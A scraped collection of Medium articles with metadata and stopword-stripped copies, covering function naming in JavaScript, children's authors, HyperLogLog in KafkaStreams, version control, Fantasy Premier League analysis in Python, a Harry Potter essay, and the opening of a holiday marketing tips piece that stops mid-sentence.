UX Design Dashboard
3,867
A Useful Framework for Naming Your Classes, Functions, and Variables
Actions Are the Heart of a Function Actions are the verb part of your function name. They’re the most important part in describing what the function does. - get Accesses data immediately (i.e., shorthand getter of internal data). function getFruitsCount() { return this.fruits.length; } - set Declaratively sets a variable with value A to value B . const fruits = 0 function setFruits(nextFruits) { fruits = nextFruits } setFruits(5) console.log(fruits) // 5 - reset Sets a variable back to its initial value or state. const initialFruits = 5 const fruits = initialFruits setFruits(10) console.log(fruits) // 10 function resetFruits() { fruits = initialFruits } resetFruits() console.log(fruits) // 5 - fetch Requests data, which takes time (e.g., an async request). function fetchPosts(postCount) { return fetch('https://api.dev/posts', {...}) } - remove Removes something from somewhere. For example, if you have a collection of selected filters on a search page, removing one of them from the collection is removeFilter , not deleteFilter (and this is how you’d naturally say it in English as well): function removeFilter(filterName, filters) { return filters.filter(name => name !== filterName) } const selectedFilters = ['price', 'availability', 'size'] removeFilter('price', selectedFilters) - delete Completely erases something from the realm of existence. Imagine you’re a content editor, and there’s that notorious post you wish to get rid of. Once you clicked a shiny delete-post button, the CMS performed a deletePost action, not a removePost one. function deletePost(id) { return database.find({ id }).delete() } - compose Creates new data from existing data. This is mostly applicable to strings, objects, or functions. function composePageUrl(pageName, pageId) { return `${pageName.toLowerCase()}-${pageId}` } - handle Handles an action. Often used when naming a callback method.
https://medium.com/better-programming/a-useful-framework-for-naming-your-classes-functions-and-variables-e7d186e3189f
[]
2020-12-24 15:17:13.007000+00:00
['Python', 'Software Development', 'Programming', 'Software Engineering', 'JavaScript']
Title Useful Framework Naming Classes Functions VariablesContent Actions Heart Function Actions verb part function name They’re important part describing function get Accesses data immediately ie shorthand getter internal data function getFruitsCount return thisfruitslength set Declaratively set variable value value B const fruit 0 function setFruitsnextFruits fruit nextFruits setFruits5 consolelogfruits 5 reset Sets variable back initial value state const initialFruits 5 const fruit initialFruits setFruits10 consolelogfruits 10 function resetFruits fruit initialFruits resetFruits consolelogfruits 5 fetch Requests data take time eg async request function fetchPostspostCount return fetchhttpsapidevposts remove Removes something somewhere example collection selected filter search page removing one collection removeFilter deleteFilter you’d naturally say English well function removeFilterfilterName filter return filtersfiltername name filterName const selectedFilters price availability size removeFilterprice selectedFilters delete Completely era something realm existence Imagine you’re content editor there’s notorious post wish get rid clicked shiny deletepost button CMS performed deletePost action removePost one function deletePostid return databasefind id delete compose Creates new data existing data mostly applicable string object function function composePageUrlpageName pageId return pageNametoLowerCasepageId handle Handles action Often used naming callback methodTags Python Software Development Programming Software Engineering JavaScript
3,868
The 3 Children’s Authors You Must Read
Children’s literature is one of the most sacred types of writing in the entire medium. Kids are so impressionable and curious. They want to know the answers to the big questions, taking in all of the information available to them like a sponge. It takes a truly special author to tap into their own childlike imagination, remembering what intrigued them so many years ago about the world around them. What makes a high quality book for young ones? Does it teach them about history and people? Does the story have the characters that the reader can relate to, while also not being too harsh about the realities of life? Is the language overblown with large vocabulary that is not yet understandable? At the same time, kids are not stupid. The writer should never talk down to their audience. I wanted to present three children’s authors that I enjoyed growing up that I know others benefited from just as much as me. They write timeless stories that are still enjoyed to this day, and hopefully for many more generations into the future. Enjoy! Mary Pope-Osborne Author of one of the best-selling children’s series of the past 30 years, her Magic Tree House saga has been mixing culture, history, and fun into a magical mix for multiple generations of children. Jack and Annie are the brother-sister duo protagonists of the novels, allowing children of both genders to see themselves in the novels while reading about their various adventures. Pope-Osborne runs the gamut on historical and cultural references, sending the siblings back in time through their neighborhood tree house to an enormous set of locations and events. The American Civil and Revolutionary Wars, the sinking of the Titanic, the 1906 San Francisco earthquake, and the volcanic eruption of Mt.Vesuvius are just a sampling of the iconic time pieces that kids are introduced to in accurate and magical ways. History is something that people of all ages should educate themselves on more, so it is vital to kindle a love and interest in it from an early age. These books mix fantastical elements and fictional characters right into the nonfictional happenings of real life in a way that I’ve rarely seen in youth literature. By blurring the line between what’s real and what isn’t, the author convinces the child to have a lifelong love learning about the fascinating countries, mountains, languages, animals, disasters, and peoples that combine to make up our magical planet! Photo by Vincent Branciforti on Unsplash Andrew Clements Known most for the 1996 best-seller Frindle, detailing a student’s made-up term for a pen, Andrew Clements had a unique ability to get inside the mind of the average 11 year old and put their thoughts and emotions onto the page for his readers. His literature hones in on a single protagonist who usually butts heads with an adult somewhere in the classroom or domestically. Nothing too serious, but the problems all give enough food for thought to munch on for a couple hundred pages. The kid who stars in the work is given respect by being put on equal footing with the adult who is opposing them. By taking the authority figure and putting that person on equal terms with the younger student, Clements makes both characters see eye-to-eye a little better. By the end of the novels, the child protagonist has grown up a little more, and the adult has gained greater appreciation for the creativity and innocence of the immature mind. Although Clements himself is no longer with us, his work will continue to be relatable to elementary and middle school students for decades to come. Themes like imagination, friendship, leadership, and teamwork never go out of style. Lemony Snicket/Daniel Handler Handler published under the pen name Lemony Snicket when releasing his iconic set of novels, A Series of Unfortunate Events during the early 2000’s. The saga of the three orphaned Baudelaire siblings who are constantly on the run from the evil Count Olaf has sold millions of copies throughout its lifetime and been adapted into a film in 2004 and a Netflix series between 2017–2019. What makes this work such a must-read for any late-elementary school to middle-school aged kid is the amount of exposure they will receive to real-life problems, but doing so with a whimsy and sense of humor which is unmatched. The protagonists of the series use their inventiveness, book-smarts, and love of one another to overcome any problem they are faced with, which includes arson, underage marriage, and murder. These are all mature themes that have gotten the books banned from the libraries of certain schools around the United States, but rest assured that all of the topics are covered by Handler in a way that is not disturbing to a child. Tone and wording make the macabre elements more cartoony or comical than would be indicated in an adult novel. It introduces young readers to key literature analysis practices that they will certainly be doing much more often as they age into new curriculums. The books force the reader to debate the motivations and intentions behind every protagonist and antagonist, advancing past the surface level plot trope discussions that normally happen in early novel discussions. They’re a must for children and adults alike. And when you can get both age groups in the same room to talk about a book, that’s when you know it’s special.
https://medium.com/age-of-awareness/the-3-childrens-authors-you-must-read-ff3c7e9b8998
['Shawn Laib']
2020-12-08 05:16:01.012000+00:00
['Education', 'Books', 'Children', 'Creativity', 'Teaching']
Title 3 Children’s Authors Must ReadContent Children’s literature one sacred type writing entire medium Kids impressionable curious want know answer big question taking information available like sponge take truly special author tap childlike imagination remembering intrigued many year ago world around make high quality book young one teach history people story character reader relate also harsh reality life language overblown large vocabulary yet understandable time kid stupid writer never talk audience wanted present three children’s author enjoyed growing know others benefited much write timeless story still enjoyed day hopefully many generation future Enjoy Mary PopeOsborne Author one bestselling children’s series past 30 year Magic Tree House saga mixing culture history fun magical mix multiple generation child Jack Annie brothersister duo protagonist novel allowing child gender see novel reading various adventure PopeOsborne run gamut historical cultural reference sending sibling back time neighborhood tree house enormous set location event American Civil Revolutionary Wars sinking Titanic 1906 San Francisco earthquake volcanic eruption MtVesuvius sampling iconic time piece kid introduced accurate magical way History something people age educate vital kindle love interest early age book mix fantastical element fictional character right nonfictional happening real life way I’ve rarely seen youth literature blurring line what’s real isn’t author convinces child lifelong love learning fascinating country mountain language animal disaster people combine make magical planet Photo Vincent Branciforti Unsplash Andrew Clements Known 1996 bestseller Frindle detailing student’s madeup term pen Andrew Clements unique ability get inside mind average 11 year old put thought emotion onto page reader literature hone single protagonist usually butt head adult somewhere classroom domestically Nothing serious problem give enough food thought munch couple hundred page kid star work given respect put equal footing adult opposing taking authority figure putting person equal term younger student Clements make character see eyetoeye little better end novel child protagonist grown little adult gained greater appreciation creativity innocence immature mind Although Clements longer u work continue relatable elementary middle school student decade come Themes like imagination friendship leadership teamwork never go style Lemony SnicketDaniel Handler Handler published pen name Lemony Snicket releasing iconic set novel Series Unfortunate Events early 2000’s saga three orphaned Baudelaire sibling constantly run evil Count Olaf sold million copy throughout lifetime adapted film 2004 Netflix series 2017–2019 make work mustread lateelementary school middleschool aged kid amount exposure receive reallife problem whimsy sense humor unmatched protagonist series use inventiveness booksmarts love one another overcome problem faced includes arson underage marriage murder mature theme gotten book banned library certain school around United States rest assured topic covered Handler way disturbing child Tone wording make macabre element cartoony comical would indicated adult novel introduces young reader key literature analysis practice certainly much often age new curriculum book force reader debate motivation intention behind every protagonist antagonist advancing past surface level plot trope discussion normally happen early novel discussion They’re must child adult alike get age group room talk book that’s know it’s specialTags Education Books Children Creativity Teaching
3,869
Streaming With Probabilistic Data Structures: Why & How
In recent years, streaming libraries seem to have evolved significantly. To name a few, we’ve seen Akka Streams, KafkaStreams, Flink, Spark Streaming and others, becoming increasingly popular. There might be numerous reasons for that. A common motivation for using stream processing in your systems is to avoid heavy computations upon raw data in read-time. Instead, we can move those computations to an earlier stage — around the time when the raw data is produced. This architectural pattern allows us to obtain better response times in time-critical transactions, and have surged in popularity in correlation to the general growth of the data organizations handle. In this story, I will examine a rather complicated scenario that can not be easily solved by the intuitive capabilities that streamlining libraries usually offer. I will demonstrate how probabilistic data structures can help us mitigate a common anti-pattern often encountered in stream processing applications: carrying non-aggregative raw data deep down into a streaming topology for calculations, such as distinct count of elements. Before that, I will briefly review how streaming, in general, helps in maintaining aggregations of data, and why it might be a good idea to adopt it in some use-cases. I will use KafkaStreams for demonstrations along the way, but the concepts explored here can be applied in virtually any streaming library. Examples are written in Scala. Aggregating Upon A Stream Oftentimes, we want to aggregate raw data into some meaningful representation that will serve a business need later on. The simplest example for this, perhaps, is the WordCount program, which is kind of the HelloWorld of many streaming libraries. Here is an implementation of it using KafkaStreams. Basically, what it does is: consume some source Kafka topic as a stream some source Kafka topic as a stream split each value into single words each value into single words group that stream by each word that stream by each word count the occurrences per word the occurrences per word produce the results to another Kafka topic The basic idea behind using aggregations in your systems is planning ahead. If you figure out what you want to know about the raw data at a later stage, you can aggregate it and shape it into a form that represents the answers to those questions — right when you first know about the raw data. That means, it happens before those questions are being asked. In fact, some might never be asked, because practically, we are preparing answers for all possible questions we might need answers for! Stream processing aggregation in a nutshell This approach stands in complete opposition to the more conventional one — querying a database upon request and then crunching the results in order to achieve some desired result. This might work well in small apps maintained by small or medium sized teams, but becomes less practical with big data and boundaries between domains and teams naturally emerge. In that scenario, maintaining aggregations often are the adequate solution to various business requirements. Without stream processing, applications need to query and compute upon state in real time The Problem At Hand: Distinct Hashtag Count Alas, not all aggregations are achieved with the same degree of ease. It is no wonder that WordCount is so common as a beginner’s example — it is very easy to implement and understand. But let’s explore a different scenario. Take a social media ecosystem where we need to keep track of how many unique hashtags each user has mentioned in their posts. At a first glance, the streaming solution for this request seems like a direct continuation of what we’ve seen in WordCount. We could consume posts data, group it by user, and then extract & aggregate the hashtags used, perhaps in some Set , which would allow us to easily obtain our desired metric — distinct count. A pseudo-topology that seemingly answers the requests in an adequate way This is how our KafkaStreams topology might look like: A few things happen here. First, I’ve used type aliases in order to avoid the semantically-meaningless String flooding the code. Furthermore, I’ve extracted the logic of obtaining a Set[Hashtag] from a Post to a private function. Other than that, this is exactly what was just described. One of the things I like about KafkaStreams is how intuitive the API is — I think it is pretty easy to grasp and understand this piece of code, even if you haven’t worked with KafkaStreams before. One thing to remember is that this topology will continuously produce massages upon each change to the aggregation, and might be seen as a stream of updates. If you only need the latest state, you can define the output topic as log-compacted. There’s just one problem with this implementation: we have an unbounded data-structure in our topology, which means our streaming application can become more memory heavy than we might have predicted. Remember we said that aggregations are about transforming raw data in a way that fits our read-time needs? Well, our current implementation seems to have violated that concept. We don’t need that Set[Hashtag] really, we just want to know its size. But how can we maintain that number in a streaming application without keeping the underlying Set available? Can we do better? Probabilistic Data Structures To The Rescue Well, of course we can! This is where probabilistic data structures come in. If you haven’t heard of them, don’t worry, we’re going to explore an example together. We will focus on HyperLogLog (aka HLL), a probabilistic data structure that is aimed at solving the very problem we’re facing: … the count-distinct problem… [which] is the problem of finding the number of distinct elements in a data stream with repeated elements (Wikipedia) While the initial, Set -based solution will always be 100% accurate, HyperLogLog suggests a tradeoff: the allocated memory will be of a fixed size, but it might not be absolutely accurate at all times. By and large, the error rate is correlative to the allocated memory. Moreover, in most cases, the error will be of relatively small severity — that is, the estimated count might be off by just a bit. This is why HyperLogLog is considered a probabilistic data structure. In many use cases, this is a reasonable deal. If you’re working on a scenario in which you cannot have any error at all, then this kind of data structures are probably not suitable for your needs. A Scala Implementation Algebird is a neat Scala library created by the folks at Twitter, which is aimed at providing “abstractions for abstract algebra”. A significant part of that library revolves around approximate data types, and includes a HyperLogLog implementation. We’ll try to adapt our KafkaStreams app to use it, but first, let’s examine how to work with Algebird’s HyperLogLog implementation. The HLL type is the data structure itself. It responds to the #approximateSize method, allowing us to obtain the desired number — set-size, which is also known as cardinality. Similarly to working with the naïve Set , here we will also need to add elements to our data structure. Unlike Set , though, adding elements to an HLL is slightly more complex. The thing is, elements added aren’t kept within the HLL , as they are in a conventional Set . That’s the magic of HyperLogLog! If you’re curious about how it actually works, there are tons of videos or articles about it online. Previously, we relied on Set ‘s direct API for adding entries to the set. Algebird’s support for HyperLogLog relies on a common abstraction to achieve the same goal — combining things. That abstraction is called Monoid . Generally speaking, a Monoid for some type A lets us get an empty A and combine any two A ’s. And so, in order to add an element to an HLL , we need to obtain a HyperLogLogMonoid . This is achieved easily: val hllMonoid: HyperLogLogMonoid = new HyperLogLogMonoid(bits = 8) Note that you decide how many bits to allocate — this allows us to control the error rate. We can then get our empty, zero-state HLL : val init: HLL = hllMonoid.zero And simply add elements to it: val newElementData: Array[Byte] = "foobar".toCharArray.map(_.toByte) val newElement: HLL = hllMonoid.create(newElementData) val updatedHLL: HLL = init + newElement As you can see, we can use the HyperLogLogMonoid#create method in order to create a new HLL by passing an Array[Byte] to it. After that, we can add our new HLL to the existing one and get a new one with an updated state. With this knowledge, we can prepare an aggregation function that will replace the previous one we’ve had. We will group all this goodness together under a helper object, Aggregation : As you can see, we are using HyperLogLogMonoid#sum here, in addition to #create . It allows us to combine several HLL s into one, which suits our needs perfectly: we’ll extract the Hashtag s from each Post , then sum them into a HLL , which we will add to the existing, aggregative HLL . Exactly what we wanted to achieve! Putting It All Together With our aggregation function and initialization value ready, we can now go back to our KafkaStreams topology and use them there: I needed to adapt just two lines from the former implementation — the parameters passed to aggregate (line 22) and the way to obtain the (estimated) cardinality, in the map function (line 24). There’s just one thing left — we need to find a way to obtain a Serde[HLL] . If you are unfamiliar with KafkaStreams, this is Serde ‘s definition according to the official documentation: Every Kafka Streams application must provide SerDes (Serializer/Deserializer) for the data types of record keys and record values (e.g. java.lang.String ) to materialize the data when necessary. Essentially, KafkaStreams might need a certain Serde for various operations. Our code would not compile without it. Since aggregation by nature is a stateful operation (simply because we operate on information which is not bounded at the current message being processed), KafkaStreams needs to know how the information can be serialized and deserialized. Luckily, it is pretty easy to get a Serde[HLL] , like this: And with that we’re pretty much done! We’ve managed to incorporate HyperLogLog into our KafkaStreams topology, and honestly, we could have done that in any other Scala streaming library with the same effort, roughly. The main takeaway is how easy this change was and how elegant and concise the end result is. The full code, which includes tests and a runnable apps, is available here. Beyond HyperLogLog Perhaps by now you’re convinced that probabilistic data structures are really fascinating — and there is more than HyperLogLog! If you’re interested, don’t hesitate checking out other data structures implemented in Algebird:
https://medium.com/riskified-technology/streaming-with-probabilistic-data-structures-why-how-b83b2adcd5d4
['Eliav Lavi']
2020-10-27 10:11:11.572000+00:00
['Streaming', 'Engineering', 'Data Structures', 'Big Data', 'Scala']
Title Streaming Probabilistic Data Structures HowContent recent year streaming library seem evolved significantly name we’ve seen Akka Streams KafkaStreams Flink Spark Streaming others becoming increasingly popular might numerous reason common motivation using stream processing system avoid heavy computation upon raw data readtime Instead move computation earlier stage — around time raw data produced architectural pattern allows u obtain better response time timecritical transaction surged popularity correlation general growth data organization handle story examine rather complicated scenario easily solved intuitive capability streamlining library usually offer demonstrate probabilistic data structure help u mitigate common antipattern often encountered stream processing application carrying nonaggregative raw data deep streaming topology calculation distinct count element briefly review streaming general help maintaining aggregation data might good idea adopt usecases use KafkaStreams demonstration along way concept explored applied virtually streaming library Examples written Scala Aggregating Upon Stream Oftentimes want aggregate raw data meaningful representation serve business need later simplest example perhaps WordCount program kind HelloWorld many streaming library implementation using KafkaStreams Basically consume source Kafka topic stream source Kafka topic stream split value single word value single word group stream word stream word count occurrence per word occurrence per word produce result another Kafka topic basic idea behind using aggregation system planning ahead figure want know raw data later stage aggregate shape form represents answer question — right first know raw data mean happens question asked fact might never asked practically preparing answer possible question might need answer Stream processing aggregation nutshell approach stand complete opposition conventional one — querying database upon request crunching result order achieve desired result might work well small apps maintained small medium sized team becomes le practical big data boundary domain team naturally emerge scenario maintaining aggregation often adequate solution various business requirement Without stream processing application need query compute upon state real time Problem Hand Distinct Hashtag Count Alas aggregation achieved degree ease wonder WordCount common beginner’s example — easy implement understand let’s explore different scenario Take social medium ecosystem need keep track many unique hashtags user mentioned post first glance streaming solution request seems like direct continuation we’ve seen WordCount could consume post data group user extract aggregate hashtags used perhaps Set would allow u easily obtain desired metric — distinct count pseudotopology seemingly answer request adequate way KafkaStreams topology might look like thing happen First I’ve used type alias order avoid semanticallymeaningless String flooding code Furthermore I’ve extracted logic obtaining SetHashtag Post private function exactly described One thing like KafkaStreams intuitive API — think pretty easy grasp understand piece code even haven’t worked KafkaStreams One thing remember topology continuously produce massage upon change aggregation might seen stream update need latest state define output topic logcompacted There’s one problem implementation unbounded datastructure topology mean streaming application become memory heavy might predicted Remember said aggregation transforming raw data way fit readtime need Well current implementation seems violated concept don’t need SetHashtag really want know size maintain number streaming application without keeping underlying Set available better Probabilistic Data Structures Rescue Well course probabilistic data structure come haven’t heard don’t worry we’re going explore example together focus HyperLogLog aka HLL probabilistic data structure aimed solving problem we’re facing … countdistinct problem… problem finding number distinct element data stream repeated element Wikipedia initial Set based solution always 100 accurate HyperLogLog suggests tradeoff allocated memory fixed size might absolutely accurate time large error rate correlative allocated memory Moreover case error relatively small severity — estimated count might bit HyperLogLog considered probabilistic data structure many use case reasonable deal you’re working scenario cannot error kind data structure probably suitable need Scala Implementation Algebird neat Scala library created folk Twitter aimed providing “abstractions abstract algebra” significant part library revolves around approximate data type includes HyperLogLog implementation We’ll try adapt KafkaStreams app use first let’s examine work Algebird’s HyperLogLog implementation HLL type data structure responds approximateSize method allowing u obtain desired number — setsize also known cardinality Similarly working naïve Set also need add element data structure Unlike Set though adding element HLL slightly complex thing element added aren’t kept within HLL conventional Set That’s magic HyperLogLog you’re curious actually work ton video article online Previously relied Set ‘s direct API adding entry set Algebird’s support HyperLogLog relies common abstraction achieve goal — combining thing abstraction called Monoid Generally speaking Monoid type let u get empty combine two ’s order add element HLL need obtain HyperLogLogMonoid achieved easily val hllMonoid HyperLogLogMonoid new HyperLogLogMonoidbits 8 Note decide many bit allocate — allows u control error rate get empty zerostate HLL val init HLL hllMonoidzero simply add element val newElementData ArrayByte foobartoCharArraymaptoByte val newElement HLL hllMonoidcreatenewElementData val updatedHLL HLL init newElement see use HyperLogLogMonoidcreate method order create new HLL passing ArrayByte add new HLL existing one get new one updated state knowledge prepare aggregation function replace previous one we’ve group goodness together helper object Aggregation see using HyperLogLogMonoidsum addition create allows u combine several HLL one suit need perfectly we’ll extract Hashtag Post sum HLL add existing aggregative HLL Exactly wanted achieve Putting Together aggregation function initialization value ready go back KafkaStreams topology use needed adapt two line former implementation — parameter passed aggregate line 22 way obtain estimated cardinality map function line 24 There’s one thing left — need find way obtain SerdeHLL unfamiliar KafkaStreams Serde ‘s definition according official documentation Every Kafka Streams application must provide SerDes SerializerDeserializer data type record key record value eg javalangString materialize data necessary Essentially KafkaStreams might need certain Serde various operation code would compile without Since aggregation nature stateful operation simply operate information bounded current message processed KafkaStreams need know information serialized deserialized Luckily pretty easy get SerdeHLL like we’re pretty much done We’ve managed incorporate HyperLogLog KafkaStreams topology honestly could done Scala streaming library effort roughly main takeaway easy change elegant concise end result full code includes test runnable apps available Beyond HyperLogLog Perhaps you’re convinced probabilistic data structure really fascinating — HyperLogLog you’re interested don’t hesitate checking data structure implemented AlgebirdTags Streaming Engineering Data Structures Big Data Scala
3,870
Top Five Reasons to Learn Version Control Systems
Have you ever been in a situation when you were continually saving multiple documents with random names and got confused when you looked at them after a month or so? Well, many of us have been there including me and we know how tough that is each time! With the amount of information we’re being exposed to increasing each day, it’s important, not just for the Software Engineers, but also for many of them to retrieve any piece of information from anywhere without arduous efforts. For Software Engineers, it’s all the more crucial to gets hands-on experience using Version Control tools as they’ll be using them in their daily lives. So, without any further adieu, let’s mainly realize the top five reasons why Software Engineers (and obviously, others) should learn Version Control.
https://medium.com/datadriveninvestor/top-five-reasons-to-learn-version-control-89c33e04e9c2
['Abishaik Mohan']
2020-12-27 15:25:45.931000+00:00
['Technology', 'Software Development', 'Innovation', 'Productivity', 'Creativity']
Title Top Five Reasons Learn Version Control SystemsContent ever situation continually saving multiple document random name got confused looked month Well many u including know tough time amount information we’re exposed increasing day it’s important Software Engineers also many retrieve piece information anywhere without arduous effort Software Engineers it’s crucial get handson experience using Version Control tool they’ll using daily life without adieu let’s mainly realize top five reason Software Engineers obviously others learn Version ControlTags Technology Software Development Innovation Productivity Creativity
3,871
Python for FPL(!) Data Analytics
Python for FPL(!) Data Analytics Using Python and Matplotlib to perform Fantasy Football Data Analysis and Visualisation author’s graph Introduction There are two reasons for this piece: (1) I wanted to teach myself some Data Analysis and Visualisation techniques using Python; and (2) I need to arrest my Fantasy Football team’s slide down several leaderboards. But first, credit to David Allen for the helpful guide on accessing the Fantasy Premier League API, which can be found here. To begin, we need to set-up our notebook to use Pandas and Matplotlib (I’m using Jupyter for this), and connect to the Fantasy Premier League API to access the data needed for the analysis. #Notebook Config import requests import pandas as pd import numpy as np %matplotlib inline import matplotlib.pyplot as plt plt.style.use('ggplot') url = ' r = requests.get(url) json = r.json() #API Set-Upurl = ' https://fantasy.premierleague.com/api/bootstrap-static/' r = requests.get(url)json = r.json() Then, we can set up our Pandas DataFrames (think data tables) which will be queried for valuable insights — hopefully. Each DataFrame (_df) we create relates to a JSON data structure accessible via the FPL API. For a full list of these, run json.keys(). We’re interested in ‘elements’ (player data), ‘element_types’ (positional references), and ‘teams’. elements_df = pd.DataFrame(json['elements']) element_types_df = pd.DataFrame(json['element_types']) teams_df = pd.DataFrame(json['teams']) By default, elements_df contains a number of columns we aren’t interested in right now (for an overview of each DataFrame, see David’s article). I’ve created a new DataFrame — main_df — with columns I might want to use. main_df = elements_df[['web_name','first_name','team','element_type','now_cost','selected_by_percent','transfers_in','transfers_out','form','event_points','total_points','bonus','points_per_game','value_season','minutes','goals_scored','assists','ict_index','clean_sheets','saves']] It’s important to note that elements_df uses keys to reference things such as a player’s position and team. For example, in column ‘element_type’, a value of “1” = goalkeeper, and in column ‘team’ a value of “1” = Arsenal. These are references to the two other DataFrames we created (element_types_df, and teams_df) If we preview element_types_df, we’ll see that each ‘id’ number here corresponds to a position:
https://towardsdatascience.com/python-for-fpl-data-analytics-dadb414ccefd
['Charlie Byatt']
2020-10-16 18:20:34.390000+00:00
['Python', 'Data Analysis', 'Matplotlib', 'Data Visualization', 'Football']
Title Python FPL Data AnalyticsContent Python FPL Data Analytics Using Python Matplotlib perform Fantasy Football Data Analysis Visualisation author’s graph Introduction two reason piece 1 wanted teach Data Analysis Visualisation technique using Python 2 need arrest Fantasy Football team’s slide several leaderboards first credit David Allen helpful guide accessing Fantasy Premier League API found begin need setup notebook use Pandas Matplotlib I’m using Jupyter connect Fantasy Premier League API access data needed analysis Notebook Config import request import panda pd import numpy np matplotlib inline import matplotlibpyplot plt pltstyleuseggplot url r requestsgeturl json rjson API SetUpurl httpsfantasypremierleaguecomapibootstrapstatic r requestsgeturljson rjson set Pandas DataFrames think data table queried valuable insight — hopefully DataFrame df create relates JSON data structure accessible via FPL API full list run jsonkeys We’re interested ‘elements’ player data ‘elementtypes’ positional reference ‘teams’ elementsdf pdDataFramejsonelements elementtypesdf pdDataFramejsonelementtypes teamsdf pdDataFramejsonteams default elementsdf contains number column aren’t interested right overview DataFrame see David’s article I’ve created new DataFrame — maindf — column might want use maindf elementsdfwebnamefirstnameteamelementtypenowcostselectedbypercenttransfersintransfersoutformeventpointstotalpointsbonuspointspergamevalueseasonminutesgoalsscoredassistsictindexcleansheetssaves It’s important note elementsdf us key reference thing player’s position team example column ‘elementtype’ value “1” goalkeeper column ‘team’ value “1” Arsenal reference two DataFrames created elementtypesdf teamsdf preview elementtypesdf we’ll see ‘id’ number corresponds positionTags Python Data Analysis Matplotlib Data Visualization Football
3,872
The “business book” version of Harry Potter
What we can learn from Harry Potter Think of how much we learn about love and friendship and perseverance through reading a book like Harry Potter. Let’s use a super relatable example of a narrative structure used well in this book and how it taught us about character motivations and reliability. (And okay, I’m going to say something here that may shock you if for some reason you’re one of the three remaining people on Earth who hasn’t read Harry Potter yet. If that’s you, then stop reading now.) Spoiler alert: Dumbledore dies. Not just dies, but Snape kills him. In cold blood. Right there, on the balcony with his wand. While Harry is watching. Damn. For me, this was one of those moments in literature that really came to define how I looked at life, death, love, and friendship. I read this book super early on in my life, while I was still a sponge for information, and it may have been one of the first characters outside of a Disney movie that I came to love who was then taken away from me. Of course, we get over this, yes. But then we also learn from it. And we learn how much of a badass Harry Potter becomes afterward — we know exactly why Harry needs to avenge his death. We know about his parents and their deaths, and we understand, even if we will never truly relate, to the reasons why he has to ultimately take on all of the horcruxes, destroy them, and eventually go toe-to-to with the evil Voldemort. Part of the beauty of this sequence is that it takes a lifetime to get there. Seven books and over 1 million words in all. Was the payoff worth it? Just look to how much the Harry Potter franchise is worth, and you tell me. Now, let’s try one more thing. I’m going to tell the Harry Potter story in a business book inspired anecdote. Ready? Here we go: Harry Potter as a business book case study: In this local school district, the unthinkable happened: The headmaster was murdered. Not only that, but the murderer remained at large. The remaining faculty and students had all the signs of early onset panic, not to mention questions from parents at home and the unrelenting press inquiries. In the 1,000 years since Hogwarts has been the pre-eminent wizarding institution, it was this murder that might put it all at risk. What could they do? But, as we’ve discussed earlier in this book, sometimes the greatest leaders emerge from the least likely of places. In the end, it wouldn’t be the headmaster-in-training or any other senior faculty who would reclaim the honor and dignity of this venerable institution, but a boy. You see, this boy had a decade’s worth of anger and revenge building up in him about murders like this. His parents had also been murdered, and, particularly early on in his school years, he was called out regularly for “being different.” (He had a peculiar scar above his forehead and a strange connection to snakes.) It turned out that, over the years, this boy, Harry, had established something similar to a paternal relationship with Albus Dumbledore. And Albus had, in turn, been teaching Harry, too. When Dumbledore was murdered, Harry rallied his friends together and committed them to a pact. They met in secret, practicing illegal spells on school property and training for a potential future battle. Eventually, these friendships, and the skills they acquired together, saved the school from the battle of the millennium, thereby saving the school, and most of those inside. This is why it’s important to always encourage the “kids who are just a little bit different.” You never know who will have a chip on their shoulder big enough to save your entire world one day. Something tells me this wouldn’t quite rally the same kind of emotional turbulence inside that would get people dressing up like wizards and taking quizzes about which sorting house they belong inside for decades to come. Maybe the trouble with business books isn’t that they aren’t telling stories. Maybe it’s just that we aren’t telling them the right way.
https://bethanymarz.medium.com/the-business-book-version-of-harry-potter-b36af7d6c29f
['Bethany Crystal']
2019-02-11 13:06:06.376000+00:00
['Business', 'People', 'Stories', 'Books', 'Harry Potter']
Title “business book” version Harry PotterContent learn Harry Potter Think much learn love friendship perseverance reading book like Harry Potter Let’s use super relatable example narrative structure used well book taught u character motivation reliability okay I’m going say something may shock reason you’re one three remaining people Earth hasn’t read Harry Potter yet that’s stop reading Spoiler alert Dumbledore dy dy Snape kill cold blood Right balcony wand Harry watching Damn one moment literature really came define looked life death love friendship read book super early life still sponge information may one first character outside Disney movie came love taken away course get yes also learn learn much badass Harry Potter becomes afterward — know exactly Harry need avenge death know parent death understand even never truly relate reason ultimately take horcruxes destroy eventually go toetoto evil Voldemort Part beauty sequence take lifetime get Seven book 1 million word payoff worth look much Harry Potter franchise worth tell let’s try one thing I’m going tell Harry Potter story business book inspired anecdote Ready go Harry Potter business book case study local school district unthinkable happened headmaster murdered murderer remained large remaining faculty student sign early onset panic mention question parent home unrelenting press inquiry 1000 year since Hogwarts preeminent wizarding institution murder might put risk could we’ve discussed earlier book sometimes greatest leader emerge least likely place end wouldn’t headmasterintraining senior faculty would reclaim honor dignity venerable institution boy see boy decade’s worth anger revenge building murder like parent also murdered particularly early school year called regularly “being different” peculiar scar forehead strange connection snake turned year boy Harry established something similar paternal relationship Albus Dumbledore Albus turn teaching Harry Dumbledore murdered Harry rallied friend together committed pact met secret practicing illegal spell school property training potential future battle Eventually friendship skill acquired together saved school battle millennium thereby saving school inside it’s important always encourage “kids little bit different” never know chip shoulder big enough save entire world one day Something tell wouldn’t quite rally kind emotional turbulence inside would get people dressing like wizard taking quiz sorting house belong inside decade come Maybe trouble business book isn’t aren’t telling story Maybe it’s aren’t telling right wayTags Business People Stories Books Harry Potter
3,873
10 Holiday Marketing Tips from Larry Kim, Neil Patel and More
It’s time to amp up and adjust our marketing strategies for the holidays! If you want to get ahead of the marketing game and stand out from the crowd, check out these incredible unicorn tips from the top social media marketing experts. We’ve got insights from Mari Smith, Neil Patel, Virginia Nussey, Dennis Yu, Lilach Bullock, Lisa Dougherty, Marsha Collier, Sujan Patel and Kristel Cuenta-Cortez. Among the tips? Leveraging live videos, launching Facebook Messenger chatbots, running social media ads and more — all with the aim of increasing brand visibility, ramping up your holiday sales and boosting ROI. So let’s jump right in — and I’ll start with my own №1 holiday marketing tip! 1. Run Facebook Messenger Ads | Larry Kim, CEO of MobileMonkey Ad prices get crazy competitive around the holidays! Since most of your sales are going to come from customers with pre-existing brand affinity, focus the majority of your social ads budget using remarketing as the targeting option rather than trying out new, unproven audiences at this critical time. People’s inboxes will be full of offers, so try reaching your audience using new higher-engagement marketing channels like Facebook Messenger ads in Facebook and Instagram to ensure your targeted audience actually sees your important marketing messages 2. Go Live on Facebook | Mari Smith, Facebook Marketing Expert Use holiday-themed Facebook Live videos to really engage with your audience this holiday season. Facebook continues to favor content that generates meaningful social interaction, specifically conversations between people within the comments on Page posts. Live video typically leads to discussion among viewers on 